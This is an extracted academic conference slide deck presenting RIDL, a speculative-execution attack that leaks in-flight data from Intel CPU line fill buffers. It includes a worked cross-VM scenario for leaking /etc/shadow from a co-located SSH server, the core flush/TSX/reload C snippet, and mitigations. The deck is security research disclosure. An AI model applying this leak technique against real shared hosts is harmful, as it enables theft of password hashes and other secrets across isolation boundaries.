#### ROGUE IN-FLIGHT DATA LOAD

<u>Stephan van Schaik</u> - Alyssa Milburn

Sebastian Österlund - Pietro Frigo - Giorgi Maisuradze\*

Kaveh Razavi - Herbert Bos - Cristiano Guiffrida





What can we still do as an attacker?

# Meet **Rogue In-flight Data Load** or RIDL A new **class** of speculative execution attacks that knows no boundaries

Privilege levels are just a social construct



We can leak between hardware threads!



But can we leak across other security domains?



Yes, we can!



We leak from the kernel ...



... across VMs ...



... from the hypervisor ...



... and from SGX enclaves!

We leak across all security domains!

Can we leak in the web browser?

Yes, we can!

Yes, we can!

We reproduced RIDL in Mozilla Firefox

Yes, we can!

- We reproduced RIDL in Mozilla Firefox
- ⇒ No need for special instructions



Memory addresses are a social construct too



Previous attacks show we can speculatively leak from addresses



Our mitigation efforts focus on isolating/masking addresses

- Spectre: access out-of-bound addresses
- Meltdown: leak kernel data from virtual addresses
- Foreshadow: leak from physical address

- Spectre: mask array index to limit address range
- Meltdown: unmap kernel addresses from userspace
- Foreshadow: invalidate physical address

# Example

#### **MELTDOWN**



Problem: leak kernel data from virtual addresses

# **MELTDOWN**



Solution: unmap kernel addresses

Previous attacks exploit addressing

- Previous attacks exploit addressing
- Mitigation by isolating/masking addresses

RIDL does *not* depend on addressing:

RIDL does *not* depend on addressing:

⇒ Bypass all address-based security checks

RIDL does not depend on addressing:

- ⇒ Bypass all address-based security checks
- → Makes RIDL hard to mitigate

What CPUs does RIDL affect?

We bought Intel and AMD CPUs from almost every generation since 2008

... and sent the invoices to Herbert





Support Home > Processors >

#### Side-channel Vulnerability and Mitigation Methods

The security of our products is one of our most important priorities.

The threat environment continues to evolve. Intel is committed to investing in the security and reliability of our products, and to working to safeguard users'

Specific to side-channel vulnerabilities, mitigations have been provided for all variants noted below through a combination of updates for:

- Firmware
- Operating systems
- Virtual Machine Manager\*

System manufacturers have incorporated these updates. Some Intel products may contain hardware mitigations. See the table below for mitigation details:

|                          | Vulnerability and Mitigation Method                             |                                                                     |                                                                    |                                                                          |                                              |                                     |
|--------------------------|-----------------------------------------------------------------|---------------------------------------------------------------------|--------------------------------------------------------------------|--------------------------------------------------------------------------|----------------------------------------------|-------------------------------------|
| Processor Model          | Variant 1<br>(Bounds Check<br>Bypass; also known<br>as Spectre) | Variant 2<br>(Branch Target<br>Injection; also known<br>as Spectre) | Variant 3<br>(Rogue Data Cache<br>Load; also known as<br>Meltdown) | Variant 3a<br>(Rogue System Register<br>Read; also known as<br>Meltdown) | Variant 4<br>(Rogue System<br>Register Read) | Variant 5<br>(L1 Terminal<br>Fault) |
| Intel® Core™<br>i9-9900k | OS/VMM                                                          | Firmware +OS                                                        | Hardware                                                           | Firmware                                                                 | Firmware +OS                                 | Hardware                            |
| Intel® Core™<br>i7-9700k | OS/VMM                                                          | Firmware +OS                                                        | Hardware                                                           | Firmware                                                                 | Firmware +OS                                 | Hardware                            |





Documentation

Content Type Product Information & Documentation

Article ID 000031501

Last Reviewed 11/21/2018

- Firmware
- Operating systems
- Virtual Machine Manager\*

System manufacturers have incorporated these updates. Some Intel products may contain hardware mitigations. See the table below for mitigation details:

|                          | Vulnerability and Mitigation Method                                   |                                                                           |                                                                       |                                                                             |                                        |                                           |
|--------------------------|-----------------------------------------------------------------------|---------------------------------------------------------------------------|-----------------------------------------------------------------------|-----------------------------------------------------------------------------|----------------------------------------|-------------------------------------------|
| Processor<br>Model       | Variant 1<br>(Bounds<br>Check<br>Bypass; also<br>known as<br>Spectre) | Variant 2<br>(Branch<br>Target<br>Injection; also<br>known as<br>Spectre) | Variant 3<br>(Rogue Data<br>Cache Load;<br>also known as<br>Meltdown) | Variant 3a<br>(Rogue System<br>Register Read;<br>also known as<br>Meltdown) | Variant 4 (Rogue System Register Read) | Variant<br>5<br>(L1<br>Terminal<br>Fault) |
| Intel® Core™<br>i9-9900k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |
| Intel® Core™<br>i7-9700k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |
| Intel® Core™<br>i5-9600k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |
| Intel® Core™             |                                                                       |                                                                           |                                                                       |                                                                             | Firmware                               |                                           |

#### Intel announces Coffee Lake Refresh

- Firmware
- Operating systems
- Virtual Machine Manager\*

System manufacturers have incorporated these updates. Some Intel products may contain hardware mitigations. See the table below for mitigation details:

|                          | Vulnerability and Mitigation Method                                   |                                                                           |                                                                       |                                                                             |                                        |                               |
|--------------------------|-----------------------------------------------------------------------|---------------------------------------------------------------------------|-----------------------------------------------------------------------|-----------------------------------------------------------------------------|----------------------------------------|-------------------------------|
| Processor<br>Model       | Variant 1<br>(Bounds<br>Check<br>Bypass; also<br>known as<br>Spectre) | Variant 2<br>(Branch<br>Target<br>Injection; also<br>known as<br>Spectre) | Variant 3<br>(Rogue Data<br>Cache Load;<br>also known as<br>Meltdown) | Variant 3a<br>(Rogue System<br>Register Read;<br>also known as<br>Meltdown) | Variant 4 (Rogue System Register Read) | Variant 5 (L1 Terminal Fault) |
| Intel® Core™<br>i9-9900k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                      |
| Intel® Core™<br>i7-9700k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                      |
| Intel® Core™<br>i5-9600k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                      |
| Intel® Core™             |                                                                       |                                                                           |                                                                       |                                                                             | Firmware                               |                               |

# In-silicon mitigations against Meltdown and Foreshadow

- Firmware
- Operating systems
- Virtual Machine Manager\*

System manufacturers have incorporated these updates. Some Intel products may contain hardware mitigations. See the table below for mitigation details:

|                          | Vulnerability and Mitigation Method                                   |                                                                           |                                                                       |                                                                             |                                        |                                           |
|--------------------------|-----------------------------------------------------------------------|---------------------------------------------------------------------------|-----------------------------------------------------------------------|-----------------------------------------------------------------------------|----------------------------------------|-------------------------------------------|
| Processor<br>Model       | Variant 1<br>(Bounds<br>Check<br>Bypass; also<br>known as<br>Spectre) | Variant 2<br>(Branch<br>Target<br>Injection; also<br>known as<br>Spectre) | Variant 3<br>(Rogue Data<br>Cache Load;<br>also known as<br>Meltdown) | Variant 3a<br>(Rogue System<br>Register Read;<br>also known as<br>Meltdown) | Variant 4 (Rogue System Register Read) | Variant<br>5<br>(L1<br>Terminal<br>Fault) |
| Intel® Core™<br>i9-9900k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |
| Intel® Core™<br>i7-9700k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |
| Intel® Core™<br>i5-9600k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |
| Intel® Core™             |                                                                       |                                                                           |                                                                       |                                                                             | Firmware                               |                                           |

#### Let's buy the Intel Core i9-9900K!

... and send another invoice to Herbert



We got it the day after we submitted the paper

\_\_\_

RIDL works regardless of these in-silicon mitigations

- Intel Xeon Silver 4110 (Skylake SP) 2017
- √ Intel Core i7-8700K (Coffee Lake) 2017
- Intel Core i7-7800X (Skylake X) 2017
- Intel Core i7-7700K (Kaby Lake) 2017
- Intel Core i7-6700K (Skylake) 2015
- ✓ Intel Core i7-5775C (Broadwel) 2015
- ✓ Intel Core i7-4790 (Haswell) 2014
- ✓ Intel Core i7-3770K (Ivy Bridge) 2012
- ✓ Intel Core i7-2600 (Sandy Bridge) 2011
- ✓ Intel Core i3-550 (Westmere) 2010
- √ Intel Core i7-920 (Nehalem) 2008

## **AMD**

We also tried to reproduce it on AMD

#### **AMD**

We also tried to reproduce it on AMD RIDL does *not* affect AMD

- ✓ Intel Core i9-9900K (Coffee Lake R) 2018
- ✓ Intel Xeon Silver 4110 (Skylake SP) 2017
- ✓ Intel Core i7-8700K (Coffee Lake) 2017
- ✓ Intel Core i7-7800X (Skylake X) 2017
- √ Intel Core i7-7700K (Kaby Lake) 2017
- ✓ Intel Core i7-6700K (Skylake) 2015
- ✓ Intel Core i7-5775C (Broadwel) 2015
- ✓ Intel Core i7-4790 (Haswell) 2014
- ✓ Intel Core i7-3770K (Ivy Bridge) 2012
- Intel Core i7-2600 (Sandy Bridge) 2011
- ✓ Intel Core i3-550 (Westmere) 2010
- ✓ Intel Core i7-920 (Nehalem) 2008



But where are we actually leaking from?





Previous attacks had it easy, they leak from caches



Caches are well documented and well understood.



But RIDL does not leak from caches!



But what else is there to leak from?



There are other internal CPU buffers



Line Fill Buffers, Store Buffers and Load Ports



But there is more!



**Uncached Memory** 



RIDL is a **class** of speculative execution attacks also known as **M**icro-architectural **D**ata **S**ampling

Let's focus on one particular instance:

Line Fill Buffers

#### **MANUALS**

MEM\_LOAD\_UOPS\_RETIRED.HIT\_LFB\_PS - Counts demand loads that hit in the line fill buffer (LFB). A LFB entry is allocated every time a miss occurs in the L1 DCache. When a load hits at this location it means that a previous load, store or hardware prefetch has already missed in the L1 DCache and the data fetch is in progress. Therefore the cost of a hit in the LFB varies. This event may count cache-line split loads that miss in the L1 DCache but do not miss the LLC.

On 32-byte Intel AVX loads, all loads that miss in the L1 DCache show up as hits in the L1 DCache or hits in the LFB. They never show hits on any other level of memory hierarchy. Most loads arise from the line fill buffer (LFB) when Intel AVX loads miss in the L1 DCache.

- We first read the manuals
- Some references to internal CPU buffers
- But no further explanation
- Where would you even start?

That's why we started reading patents instead!



We read a lot of patents, and survived!

So today I can tell you a bit more about them

But wait, what are these Line Fill Buffers?

They were never mentioned during my Computer Architecture courses but maybe I didn't pay attention

#### LINE FILL BUFFERS?



Central buffer between execution units, L1d and L2 to improve memory throughput

#### LINE FILL BUFFERS?



Central buffer between execution units, L1d and L2 to improve memory throughput



Central buffer between execution units, L1d and L2 to improve memory throughput



Central buffer between execution units, L1d and L2 to improve memory throughput

#### Multiple roles:

- Asynchronous memory requests
- Load squashing
- Write combining
- Uncached memory

#### Multiple roles:

- Asynchronous memory requests
- Load squashing
- Write combining
- Uncached memory

CPU design: what to do on a cache miss?

CPU design: what to do on a cache miss?

Send out memory request

CPU design: what to do on a cache miss?

- Send out memory request
- Wait for completion

CPU design: what to do on a cache miss?

- Send out memory request
- Wait for completion
- Blocks other loads/stores

Solution: keep track of address in LFB

Send out memory request

- Send out memory request
- Allocate LFB entry

- Send out memory request
- Allocate LFB entry
- Store address in LFB

- Send out memory request
- Allocate LFB entry
- Store address in LFB
- Serve other loads/stores

- Send out memory request
- Allocate LFB entry
- Store address in LFB
- Serve other loads/stores
- Pending request eventually completes

- Send out memory request
- Allocate LFB entry
- Store address in LFB
- Serve other loads/stores
- Pending request eventually completes

Allocate LFB entry

May contain data from previous load RIDL exploits this

Experiments in the paper



Experiments in the paper



Experiments in the paper



Conclusion: our primary RIDL instance leaks from Line Fill Buffers

How do we mount a RIDL attack?

Victim VM

Victim VM in the cloud

Attacker VM

Victim VM

We get a VM on the same server

Attacker VM

Line Fill Buffers Victim VM

We make sure it is co-located

Attacker VM

Line Fill Buffers Victim VM
/etc/shadow
SSH server

Victim VM runs an SSH server

#### **CHALLENGES**

- X Getting data in flight
- X Leaking data
- X Filtering data

Attacker VM

Line Fill Buffers Victim VM
/etc/shadow
SSH server

How do we get data in flight?

Attacker VM

SSH client

Line Fill Buffers Victim VM
/etc/shadow
SSH server

We run an SSH client...



... that keeps connecting to the SSH server



The SSH server loads /etc/shadow through LFB



The contents from /etc/shadow are in flight

#### **CHALLENGES**

- X Getting data in flight
- X Leaking data
- X Filtering data

#### **LEAKING**

Attacker VM

SSH client

Line Fill Buffers Victim VM

/etc/shadow

SSH server

Now that the data is in flight, we want to leak it

#### **LEAKING**

Attacker VM
RIDL
SSH client

Line Fill Buffers Victim VM
/etc/shadow
SSH server

We run our RIDL program on our server...

### **LEAKING**



...which leaks the data from the LFB

What does this program look like?

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2 RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2 RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2 RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)NULL;
   char *p = probe + byte * 4096;
   *(volatile char *)p;
   _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
    char byte = *(volatile char *)NULL;

    Leak in-flight data from an invalid or
        unmapped page, also works for
        demand paging.
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2) RIDL

```
Use the leaked byte as an index into our probe array.

*(volatile char *)p;

_xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

#### **Probe Array**

SLOW

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

#### **Probe Array**

**SLOW** 

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2 RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

**Probe Array** 

**SLOW** 

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### 2 RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

#### (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

**Probe Array** 

**FAST** 

## **CHALLENGES**

- Getting data in flight
- X Leaking data
- X Filtering data



RIDL is like drinking from a fire hose



You just get whatever data is in flight!

How can we filter data?

We want to leak from /etc/shadow

- We want to leak from /etc/shadow
- First line /etc/shadow is for root

- We want to leak from /etc/shadow
- First line /etc/shadow is for root
- Starts with "root:"

- We want to leak from /etc/shadow
- First line /etc/shadow is for root
- Starts with "root:"
- Use prefix matching:
  - Match ⇒ we learn a new byte
  - No Match ⇒ discard

#### **Known Prefix**

| r o o t | : |
|---------|---|
|---------|---|

#### **Known Prefix**

| r o o t | : |  |
|---------|---|--|
|---------|---|--|

| h | t | t | р | S | : | / | / |
|---|---|---|---|---|---|---|---|
|---|---|---|---|---|---|---|---|

#### **Known Prefix**

r o o t :

#### No Match

h t t p s : / /

#### **Known Prefix**



#### No Match





# Known Prefix r o o t : Image: colspan="2">Image: co

#### **Known Prefix**



#### No Match



#### Match



R E A D M E . T

#### **Known Prefix** 0 0 No Match S Match S p 0 No Match Ε Ε R Α M D

#### **Known Prefix** 0 0 No Match S Match S p 0 No Match Ε Т Ε Α M R D S p 0



## **CHALLENGES**

- Getting data in flight
- Leaking data
- X Filtering data

More examples in the paper:

More examples in the paper:

• Leaking internal CPU data (e.g. page tables)

More examples in the paper:

- Leaking internal CPU data (e.g. page tables)
- Arbitrary kernel read

More examples in the paper:

- Leaking internal CPU data (e.g. page tables)
- Arbitrary kernel read
- Leaking in the browser

### **MITIGATION**

- Same-thread:
  - verw overwrite all buffers
  - Special Assembly snippets
- Cross-thread:
  - Complex scheduling and synchronization

### **MITIGATION**

- Same-thread:
  - verw overwrite all buffers
  - Special Assembly snippets
- Cross-thread:
  - Complex scheduling and synchronization
  - Disable Intel Hyper-Threading®

Disclosure process

Sep Oct Nov Dec Jan Feb Mar Apr May















# **MDS TOOL**

We wrote a tool to verify your system:



• Spectre and Meltdown, just one mistake?

- Spectre and Meltdown, just one mistake?
- New class of speculative execution attacks

- Spectre and Meltdown, just one mistake?
- New class of speculative execution attacks
- Many more buffers other than caches to leak from

- Spectre and Meltdown, just one mistake?
- New class of speculative execution attacks
- Many more buffers other than caches to leak from
- Does not rely on addresses ⇒ hard to mitigate

- Spectre and Meltdown, just one mistake?
- New class of speculative execution attacks
- Many more buffers other than caches to leak from
- Does not rely on addresses ⇒ hard to mitigate
- Across security domains, and in the browser

- Spectre and Meltdown, just one mistake?
- New class of speculative execution attacks
- Many more buffers other than caches to leak from
- Does not rely on addresses ⇒ hard to mitigate
- Across security domains, and in the browser
  - @themadstephan @vu5ec
    - https://mdsattacks.com